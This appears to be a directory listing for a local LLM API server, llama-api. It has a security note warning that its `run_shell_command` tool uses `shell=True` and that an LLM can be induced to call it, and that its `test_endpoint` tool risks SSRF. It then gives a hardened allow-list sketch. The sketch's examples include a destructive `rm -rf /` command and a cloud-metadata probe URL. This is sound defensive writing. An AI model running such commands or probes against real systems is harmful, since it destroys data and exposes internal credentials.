llama-api
by MuscleGear5
Overview
A local LLM API server for chat completions, tool calling, vision, embeddings, and audio transcription, integrated with developer tools.
Installation
docker-compose -f docker-compose.prod.yml up -d

Security Notes
The project includes a built-in tool, `run_shell_command`, which executes its input via `subprocess.run(command, shell=True)`. This is a critical security vulnerability: it allows arbitrary shell command execution whenever an attacker can induce the LLM to call the tool or can directly reach an API endpoint that invokes tools. Even though it is intended for developer use, exposing this capability with `shell=True` creates a significant risk of sandbox escape and full system compromise. Additionally, the `test_endpoint` MCP tool can make HTTP requests to arbitrary URLs, which could be abused for server-side request forgery (SSRF) if the target URLs are not restricted.
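The risks above can be narrowed with two standard mitigations. The sketch below is illustrative, not the project's actual code: `run_shell_command_safer`, the allow-lists, and `is_url_allowed` are hypothetical names, shown as one way to avoid `shell=True` (by splitting arguments with `shlex` and allow-listing binaries) and to limit SSRF (by allow-listing target hosts).

```python
import shlex
import subprocess
from urllib.parse import urlparse

# Hypothetical hardened replacement for the vulnerable pattern
#   subprocess.run(command, shell=True)   # attacker-controlled string hits a shell
def run_shell_command_safer(
    command: str,
    allowed: frozenset = frozenset({"ls", "cat", "git"}),  # example allow-list
) -> str:
    """Run a command without a shell, only if the binary is allow-listed."""
    argv = shlex.split(command)  # no shell, so metacharacters like ; && | are inert
    if not argv or argv[0] not in allowed:
        raise PermissionError(f"command not allowed: {argv[:1]}")
    result = subprocess.run(
        argv, shell=False, capture_output=True, text=True, timeout=10
    )
    return result.stdout

# Hypothetical guard for a tool like test_endpoint: reject URLs outside
# an explicit host allow-list to limit SSRF against internal services.
def is_url_allowed(
    url: str,
    allowed_hosts: frozenset = frozenset({"localhost", "127.0.0.1"}),
) -> bool:
    parsed = urlparse(url)
    return parsed.scheme in {"http", "https"} and parsed.hostname in allowed_hosts
```

With this pattern, a request like `run_shell_command_safer("rm -rf /")` is rejected before anything executes, and a cloud-metadata probe such as `http://169.254.169.254/...` fails the URL check; the allow-lists would need to be tuned to whatever the developer tooling legitimately requires.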
Similar Servers
zeromcp
A minimal, pure Python Model Context Protocol (MCP) server for exposing tools, resources, and prompts via HTTP/SSE and Stdio transports.
MCP-buddy
A local desktop or web application to manage and interact with multiple MCP (Model Context Protocol) servers, offering optional AI orchestration and enhancement for responses.
atlantis-mcp-server
An MCP (Model Context Protocol) server for hosting and managing dynamic Python functions and third-party MCP tools, enabling AI agents to discover and utilize shared capabilities across a network.
mcp-server-llmling
An MCP (Model Context Protocol) server providing a YAML-based system to configure and manage LLM applications, including resources, prompts, and tools.